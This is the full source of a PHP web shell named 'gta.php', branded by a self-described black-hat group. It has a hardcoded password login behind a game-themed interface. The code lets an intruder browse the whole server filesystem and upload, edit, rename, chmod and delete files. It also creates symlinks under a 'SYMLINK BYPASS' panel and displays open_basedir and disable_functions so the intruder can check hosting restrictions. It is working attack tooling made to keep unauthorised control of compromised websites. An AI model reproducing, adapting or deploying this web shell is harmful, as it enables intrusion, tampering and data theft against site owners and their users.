Viewing file:  gta.php (22.9 KB) -rw-r--r--
Select action/file-type:
 (+) |  (+) |  (+) | Code (+) | Session (+) |  (+) | SDB (+) |  (+) |  (+) |  (+) |  (+) |  (+) |
<?php
// ============================================================
// PHP FILE MANAGER - GTA
// BONDOWOSO BLACK HAT
// AUTHOR : H4nSec01
// ============================================================
session_start();
// ---------- CONFIGURATION ----------
$auth_password = 'H4nSec01'; // CHANGE THIS
$timezone = 'America/Los_Angeles';
date_default_timezone_set($timezone);
// ---------- AUTH ----------
if (!isset($_SESSION['fm_auth']) || $_SESSION['fm_auth'] !== true) {
if (isset($_POST['password']) && $_POST['password'] === $auth_password) {
$_SESSION['fm_auth'] = true;
} else {
echo '<!DOCTYPE html><html><head><title>H4nSec01 - FM</title><style>
@import url("https://fonts.googleapis.com/css2?family=Black+Ops+One&display=swap");
body{background:#000;display:flex;justify-content:center;align-items:center;height:100vh;font-family:"Black Ops One","Pricedown",Impact,"Arial Black",sans-serif;}
.login-box{background:#111;padding:30px;border:3px solid #ff3300;box-shadow:0 0 30px rgba(255,51,0,0.6);width:320px;text-align:center;}
h2{color:#ff3300;font-size:28px;letter-spacing:2px;text-shadow:2px 2px 0 #660000;margin-bottom:20px;}
input,button{width:100%;padding:12px;margin:10px 0;background:#222;border:2px solid #ff3300;color:#fff;font-family:monospace;font-size:16px;}
button{background:#ff3300;color:#000;font-weight:bold;border:none;cursor:pointer;font-family:"Black Ops One",Impact;}
button:hover{background:#ff5500;}</style></head><body>
<div class="login-box"><h2>H4nSec01 - BondowosoBlackHat</h2><form method="post"><input type="password" name="password" placeholder="ENTER PASSWORD" autofocus><button type="submit">ACCESS</button></form></div>
</body></html>';
exit;
}
}
// ---------- FUNCTIONS ----------
function format_bytes($bytes) {
if ($bytes >= 1073741824) return round($bytes / 1073741824, 2) . ' GB';
if ($bytes >= 1048576) return round($bytes / 1048576, 2) . ' MB';
if ($bytes >= 1024) return round($bytes / 1024, 2) . ' KB';
return $bytes . ' B';
}
function get_perm_string($perms) {
if (($perms & 0xC000) == 0xC000) $info = 's';
elseif (($perms & 0xA000) == 0xA000) $info = 'l';
elseif (($perms & 0x8000) == 0x8000) $info = '-';
elseif (($perms & 0x4000) == 0x4000) $info = 'd';
else $info = 'u';
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
// Get current directory
$current_dir = '/';
if (isset($_GET['dir']) && !empty($_GET['dir'])) {
$input_dir = $_GET['dir'];
$input_dir = str_replace("\0", '', $input_dir);
$real = @realpath($input_dir);
if ($real !== false && is_dir($real)) {
$current_dir = rtrim($real, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
} elseif (is_dir($input_dir)) {
$current_dir = rtrim($input_dir, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
} elseif (isset($_SESSION['last_dir'])) {
$current_dir = $_SESSION['last_dir'];
} else {
$current_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
}
} elseif (isset($_SESSION['last_dir'])) {
$current_dir = $_SESSION['last_dir'];
} else {
$current_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
}
// Handle POST actions
$message = '';
$error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action = $_POST['action'] ?? '';
if ($action === 'upload' && isset($_FILES['upload_file'])) {
$dest = $current_dir . basename($_FILES['upload_file']['name']);
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $dest)) {
$message = "Uploaded: " . htmlspecialchars(basename($_FILES['upload_file']['name']));
} else {
$error = "Upload failed.";
}
}
elseif ($action === 'rename' && !empty($_POST['target']) && !empty($_POST['new_name'])) {
$old = $current_dir . $_POST['target'];
$new = $current_dir . $_POST['new_name'];
if (file_exists($old) && rename($old, $new)) {
$message = "Renamed: {$_POST['target']} -> {$_POST['new_name']}";
} else {
$error = "Rename failed.";
}
}
elseif ($action === 'chmod' && !empty($_POST['chmod_target']) && !empty($_POST['perms'])) {
$path = $current_dir . $_POST['chmod_target'];
$octal = intval($_POST['perms'], 8);
if (@chmod($path, $octal)) {
$message = "Chmod {$_POST['perms']} applied to {$_POST['chmod_target']}";
} else {
$error = "Chmod failed.";
}
}
elseif ($action === 'edit_save' && !empty($_POST['target']) && isset($_POST['content'])) {
$path = $current_dir . $_POST['target'];
if (file_put_contents($path, $_POST['content']) !== false) {
$message = "Saved: {$_POST['target']}";
} else {
$error = "Save failed.";
}
}
elseif ($action === 'mkdir' && !empty($_POST['new_folder'])) {
$path = $current_dir . basename($_POST['new_folder']);
if (!file_exists($path)) {
if (@mkdir($path, 0755)) {
$message = "Folder created: " . basename($_POST['new_folder']);
} else {
$error = "Cannot create folder.";
}
} else {
$error = "Folder exists.";
}
}
elseif ($action === 'touch' && !empty($_POST['new_file'])) {
$path = $current_dir . basename($_POST['new_file']);
if (!file_exists($path)) {
if (file_put_contents($path, '') !== false) {
$message = "File created: " . basename($_POST['new_file']);
} else {
$error = "Cannot create file.";
}
} else {
$error = "File exists.";
}
}
elseif ($action === 'delete' && !empty($_POST['target'])) {
$path = $current_dir . $_POST['target'];
if (is_file($path)) {
if (@unlink($path)) $message = "Deleted file: {$_POST['target']}";
else $error = "Delete failed.";
} elseif (is_dir($path)) {
if (count(glob($path . '/*')) === 0) {
if (@rmdir($path)) $message = "Deleted empty folder: {$_POST['target']}";
else $error = "Cannot delete folder.";
} else {
$error = "Folder not empty.";
}
}
}
elseif ($action === 'go_path' && !empty($_POST['manual_path'])) {
$new_path = $_POST['manual_path'];
$new_path = str_replace("\0", '', $new_path);
$real = @realpath($new_path);
if ($real !== false && is_dir($real)) {
$current_dir = rtrim($real, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
header("Location: ?dir=" . urlencode($current_dir));
exit;
} elseif (is_dir($new_path)) {
$current_dir = rtrim($new_path, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
header("Location: ?dir=" . urlencode($current_dir));
exit;
} else {
$error = "Invalid directory: " . htmlspecialchars($new_path);
}
}
elseif ($action === 'create_symlink' && !empty($_POST['target_path']) && !empty($_POST['link_name'])) {
$target = $_POST['target_path'];
$link_name = $current_dir . basename($_POST['link_name']);
if (function_exists('symlink')) {
if (@symlink($target, $link_name)) {
$message = "Symlink created: " . basename($_POST['link_name']) . " -> $target";
} else {
$error = "Symlink creation failed.";
}
} else {
$error = "symlink() disabled.";
}
}
}
// Refresh
if (isset($_SESSION['last_dir'])) {
$current_dir = $_SESSION['last_dir'];
if (!is_dir($current_dir)) {
$current_dir = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, '/') . '/';
$_SESSION['last_dir'] = $current_dir;
}
}
// Read directory
$items = @scandir($current_dir);
if ($items === false) {
$error = "Cannot read directory: " . htmlspecialchars($current_dir);
$items = [];
}
$dirs = [];
$files = [];
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$full = $current_dir . $item;
if (is_dir($full)) $dirs[] = $item;
else $files[] = $item;
}
sort($dirs, SORT_NATURAL | SORT_FLAG_CASE);
sort($files, SORT_NATURAL | SORT_FLAG_CASE);
$all_items = array_merge($dirs, $files);
$edit_file = isset($_GET['edit']) ? basename($_GET['edit']) : '';
$edit_content = '';
if ($edit_file && file_exists($current_dir . $edit_file) && is_file($current_dir . $edit_file)) {
$edit_content = htmlspecialchars(file_get_contents($current_dir . $edit_file));
}
$open_basedir = ini_get('open_basedir');
$disable_functions = ini_get('disable_functions');
$is_writable = is_writable($current_dir) ? 'YES' : 'NO';
$symlink_available = function_exists('symlink') && !in_array('symlink', explode(',', $disable_functions));
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>GTA FILE MANAGER</title>
<style>
@import url("https://fonts.googleapis.com/css2?family=Black+Ops+One&display=swap");
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
background: #000;
font-family: 'Black Ops One', 'Pricedown', Impact, 'Arial Black', sans-serif;
padding: 20px;
color: #fff;
}
.container {
max-width: 1400px;
margin: 0 auto;
background: #0a0a0a;
border: 3px solid #ff3300;
box-shadow: 0 0 30px rgba(255,51,0,0.5);
}
.header {
background: #ff3300;
padding: 20px 30px;
text-align: center;
}
.header h1 {
font-size: 3rem;
letter-spacing: 4px;
color: #000;
text-shadow: 3px 3px 0 #660000;
font-family: 'Black Ops One', Impact;
}
.path-bar {
background: #111;
padding: 12px 25px;
border-bottom: 2px solid #ff3300;
display: flex;
flex-wrap: wrap;
justify-content: space-between;
align-items: center;
}
.path {
background: #1a1a1a;
padding: 6px 15px;
font-family: monospace;
color: #ff884d;
border-left: 4px solid #ff3300;
}
.writable {
background: #ff3300;
color: #000;
padding: 4px 12px;
font-weight: bold;
}
.manual-nav {
background: #0a0a0a;
padding: 12px 25px;
border-bottom: 2px solid #ff3300;
display: flex;
flex-wrap: wrap;
gap: 10px;
align-items: center;
}
.manual-nav form {
display: flex;
flex: 1;
gap: 10px;
}
.manual-nav input {
flex: 3;
padding: 8px 12px;
background: #222;
border: 2px solid #ff3300;
color: #fff;
font-family: monospace;
}
button, .nav-btn {
background: #ff3300;
color: #000;
border: none;
padding: 8px 20px;
font-weight: bold;
cursor: pointer;
font-family: 'Black Ops One', Impact;
text-decoration: none;
display: inline-block;
}
button:hover, .nav-btn:hover {
background: #ff5500;
}
.two-columns {
display: flex;
flex-wrap: wrap;
}
.sidebar {
width: 300px;
background: #0a0a0a;
border-right: 2px solid #ff3300;
padding: 20px;
}
.main-content {
flex: 1;
padding: 20px;
overflow-x: auto;
}
.action-card {
background: #111;
border: 2px solid #ff3300;
margin-bottom: 20px;
padding: 15px;
}
.action-card h3 {
color: #ff3300;
border-left: 4px solid #ff3300;
padding-left: 10px;
margin-bottom: 12px;
font-size: 1.2rem;
}
.form-group {
margin-bottom: 10px;
display: flex;
flex-wrap: wrap;
gap: 8px;
}
input, select, textarea {
background: #222;
border: 1px solid #ff3300;
color: #fff;
padding: 8px;
font-family: monospace;
}
table {
width: 100%;
border-collapse: collapse;
}
th, td {
text-align: left;
padding: 10px 8px;
border-bottom: 1px solid #ff3300;
}
th {
background: #1a1a1a;
color: #ff884d;
font-family: 'Black Ops One', Impact;
letter-spacing: 1px;
}
tr:hover {
background: #1a0a0a;
}
.folder-link {
color: #ff884d;
text-decoration: none;
font-weight: bold;
}
.folder-link:hover {
color: #ff3300;
}
.actions form {
display: inline;
}
.small-btn {
background: #333;
color: #fff;
padding: 4px 8px;
font-size: 0.7rem;
margin: 0 2px;
border: 1px solid #ff3300;
font-family: monospace;
}
.message {
background: #1e3a1e;
color: #0f0;
padding: 10px 20px;
margin: 10px 20px;
border-left: 4px solid #0f0;
}
.error {
background: #3a1e1e;
color: #ff6666;
border-left-color: #f00;
}
.server-info {
background: #111;
border: 1px solid #ff3300;
padding: 10px;
font-size: 0.7rem;
font-family: monospace;
margin-top: 20px;
}
.footer {
text-align: center;
padding: 15px;
border-top: 2px solid #ff3300;
font-size: 0.7rem;
font-family: monospace;
}
@media (max-width: 800px) {
.sidebar { width: 100%; border-right: none; border-bottom: 2px solid #ff3300; }
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>H4nSec01 - BondowosoBlackHat FM</h1>
</div>
<div class="path-bar">
<div class="path">CURRENT: <?php echo htmlspecialchars($current_dir); ?></div>
<div class="writable">WRITABLE: <?php echo $is_writable; ?></div>
</div>
<div class="manual-nav">
<strong style="color:#ff3300;">JUMP:</strong>
<form method="post">
<input type="hidden" name="action" value="go_path">
<input type="text" name="manual_path" value="<?php echo htmlspecialchars($current_dir); ?>">
<button type="submit">GO</button>
</form>
<a href="?dir=<?php echo urlencode(dirname(rtrim($current_dir,'/'))); ?>" class="nav-btn">PARENT</a>
<a href="?" class="nav-btn">RESET</a>
</div>
<?php if ($message): ?><div class="message"><?php echo htmlspecialchars($message); ?></div><?php endif; ?>
<?php if ($error): ?><div class="message error"><?php echo htmlspecialchars($error); ?></div><?php endif; ?>
<div class="two-columns">
<div class="sidebar">
<div class="action-card">
<h3>UPLOAD</h3>
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload">
<input type="file" name="upload_file" required>
<button type="submit">UPLOAD</button>
</form>
</div>
<div class="action-card">
<h3>CREATE FOLDER</h3>
<form method="post">
<input type="hidden" name="action" value="mkdir">
<input type="text" name="new_folder" placeholder="folder_name" required>
<button type="submit">CREATE</button>
</form>
</div>
<div class="action-card">
<h3>CREATE FILE</h3>
<form method="post">
<input type="hidden" name="action" value="touch">
<input type="text" name="new_file" placeholder="file.txt" required>
<button type="submit">CREATE</button>
</form>
</div>
<div class="action-card">
<h3>RENAME</h3>
<form method="post">
<input type="hidden" name="action" value="rename">
<input type="text" name="target" placeholder="current name" required>
<input type="text" name="new_name" placeholder="new name" required>
<button type="submit">RENAME</button>
</form>
</div>
<div class="action-card">
<h3>CHMOD (octal)</h3>
<form method="post">
<input type="hidden" name="action" value="chmod">
<input type="text" name="chmod_target" placeholder="file/folder name" required>
<input type="text" name="perms" placeholder="0755 or 0644" required>
<button type="submit">CHMOD</button>
</form>
</div>
<div class="action-card">
<h3>SYMLINK BYPASS</h3>
<form method="post">
<input type="hidden" name="action" value="create_symlink">
<input type="text" name="target_path" placeholder="Target absolute path" required>
<input type="text" name="link_name" placeholder="Link name (in current dir)" required>
<button type="submit">CREATE SYMLINK</button>
</form>
<div style="font-size:0.7rem; color:#ff884d; margin-top:8px;">
Symlink: <?php echo $symlink_available ? 'ENABLED' : 'DISABLED'; ?>
</div>
</div>
<div class="server-info">
<strong>SERVER INFO</strong><br>
PHP: <?php echo phpversion(); ?><br>
open_basedir: <?php echo htmlspecialchars($open_basedir ?: 'NOT SET'); ?><br>
disable_functions: <?php echo htmlspecialchars($disable_functions ?: 'none'); ?>
</div>
</div>
<div class="main-content">
<table>
<thead><tr><th>NAME</th><th>SIZE</th><th>PERMS</th><th>MODIFIED</th><th>ACTIONS</th></tr></thead>
<tbody>
<?php foreach ($all_items as $item):
$full = $current_dir . $item;
$is_dir = is_dir($full);
$perms = substr(sprintf('%o', fileperms($full)), -4);
$perm_str = get_perm_string(fileperms($full));
$size = $is_dir ? '-' : format_bytes(filesize($full));
$mtime = date('Y-m-d H:i:s', filemtime($full));
?>
<tr>
<td>
<?php if ($is_dir): ?>
<a href="?dir=<?php echo urlencode($full); ?>" class="folder-link">📁 <?php echo htmlspecialchars($item); ?></a>
<?php else: ?>
📄 <?php echo htmlspecialchars($item); ?>
<?php endif; ?>
</td>
<td><?php echo $size; ?></td>
<td><?php echo $perms . ' (' . $perm_str . ')'; ?></td>
<td><?php echo $mtime; ?></td>
<td class="actions">
<?php if (!$is_dir): ?>
<a href="?edit=<?php echo urlencode($item); ?>&dir=<?php echo urlencode($current_dir); ?>"><button type="button" class="small-btn">EDIT</button></a>
<?php endif; ?>
<form method="post" style="display:inline;" onsubmit="return confirm('DELETE <?php echo htmlspecialchars($item); ?> ?');">
<input type="hidden" name="action" value="delete">
<input type="hidden" name="target" value="<?php echo htmlspecialchars($item); ?>">
<button type="submit" class="small-btn">DEL</button>
</form>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php if ($edit_file): ?>
<div style="margin-top:30px; background:#111; border:2px solid #ff3300; padding:20px;">
<h3 style="color:#ff3300;">EDITING: <?php echo htmlspecialchars($edit_file); ?></h3>
<form method="post">
<input type="hidden" name="action" value="edit_save">
<input type="hidden" name="target" value="<?php echo htmlspecialchars($edit_file); ?>">
<textarea name="content" rows="15" style="width:100%; background:#222; color:#fff; border:1px solid #ff3300;"><?php echo $edit_content; ?></textarea>
<div style="margin-top:10px;">
<button type="submit">SAVE</button>
<a href="?dir=<?php echo urlencode($current_dir); ?>" class="nav-btn" style="background:#333;">CANCEL</a>
</div>
</form>
</div>
<?php endif; ?>
</div>
</div>
<div class="footer">
BONDOWOSO BLACK HAT FILE MANAGER // H4nSec01 - 2023
</div>
</div>
</body>
</html>
|